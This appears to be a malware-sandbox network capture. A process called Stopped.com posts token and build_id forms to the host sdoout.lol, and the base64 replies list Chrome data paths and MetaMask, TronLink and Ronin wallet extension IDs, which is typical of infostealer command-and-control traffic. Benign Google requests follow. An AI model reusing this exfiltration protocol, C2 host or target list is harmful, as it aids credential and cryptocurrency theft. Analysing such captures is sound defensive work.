                                                                                                                                                                                                                                                                                            2024-12-31 15:58:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                            Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            7192.168.2.549832116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:48 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----yc2d2djecbasrq9hdt0h
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 79 63 32 64 32 64 6a 65 63 62 61 73 72 71 39 68 64 74 30 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 79 63 32 64 32 64 6a 65 63 62 61 73 72 71 39 68 64 74 30 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 79 63 32 64 32 64 6a 65 63 62 61 73 72 71 39 68 64 74 30 68 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------yc2d2djecbasrq9hdt0hContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------yc2d2djecbasrq9hdt0hContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------yc2d2djecbasrq9hdt0hCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:48 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:49 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                            Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            8192.168.2.549841116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:49 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----yu379r9hlfkx479h47ym
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:49 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 33 37 39 72 39 68 6c 66 6b 78 34 37 39 68 34 37 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 79 75 33 37 39 72 39 68 6c 66 6b 78 34 37 39 68 34 37 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 79 75 33 37 39 72 39 68 6c 66 6b 78 34 37 39 68 34 37 79 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------yu379r9hlfkx479h47ymContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------yu379r9hlfkx479h47ymContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------yu379r9hlfkx479h47ymCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:50 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:50 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            9192.168.2.549850116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:51 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----rqi589zcba1v3ek68g47
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 6973
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:51 UTC6973OUTData Raw: 2d 2d 2d 2d 2d 2d 72 71 69 35 38 39 7a 63 62 61 31 76 33 65 6b 36 38 67 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 72 71 69 35 38 39 7a 63 62 61 31 76 33 65 6b 36 38 67 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 72 71 69 35 38 39 7a 63 62 61 31 76 33 65 6b 36 38 67 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------rqi589zcba1v3ek68g47Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------rqi589zcba1v3ek68g47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------rqi589zcba1v3ek68g47Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:51 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            10192.168.2.549857116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:52 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----v3o8y5pp8q9rqim7y5pz
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 489
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:52 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 76 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 76 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 76 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------v3o8y5pp8q9rqim7y5pzContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------v3o8y5pp8q9rqim7y5pzContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------v3o8y5pp8q9rqim7y5pzCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:52 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            11192.168.2.549876142.250.184.2284435332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:55 GMT
                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5tNvlDOd_42IUSxUisdrfQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC124INData Raw: 33 33 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 69 61 6e 74 20 73 63 68 6e 61 75 7a 65 72 20 77 69 6e 73 20 64 6f 67 20 73 68 6f 77 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 6e 65 77 73 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 73 65 61 73 6f 6e 20 31 20 6c 65 61 6b
                                                                                                                                                                                                                                                                                            Data Ascii: 33a)]}'["",["giant schnauzer wins dog show","nintendo switch release date","ripple xrp news","marvel rivals season 1 leak
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC709INData Raw: 73 22 2c 22 74 20 63 6f 72 6f 6e 61 65 20 62 6f 72 65 61 6c 69 73 20 6e 6f 76 61 22 2c 22 77 65 61 74 68 65 72 20 73 74 6f 72 6d 73 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 6c 61 75 72 65 6e 20 6d 61 65 6e 6e 65 72 20 6e 69 63 6b 20 62 6f 73 61 22 2c 22 31 32 20 67 72 61 70 65 73 20 6e 65 77 20 79 65 61 72 20 74 72 61 64 69 74 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c
                                                                                                                                                                                                                                                                                            Data Ascii: s","t coronae borealis nova","weather storms tornadoes","lauren maenner nick bosa","12 grapes new year tradition"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d",
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            12192.168.2.549880142.250.184.2284435332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:55 GMT
                                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC372INData Raw: 31 34 31 33 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                            Data Ascii: 1413)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
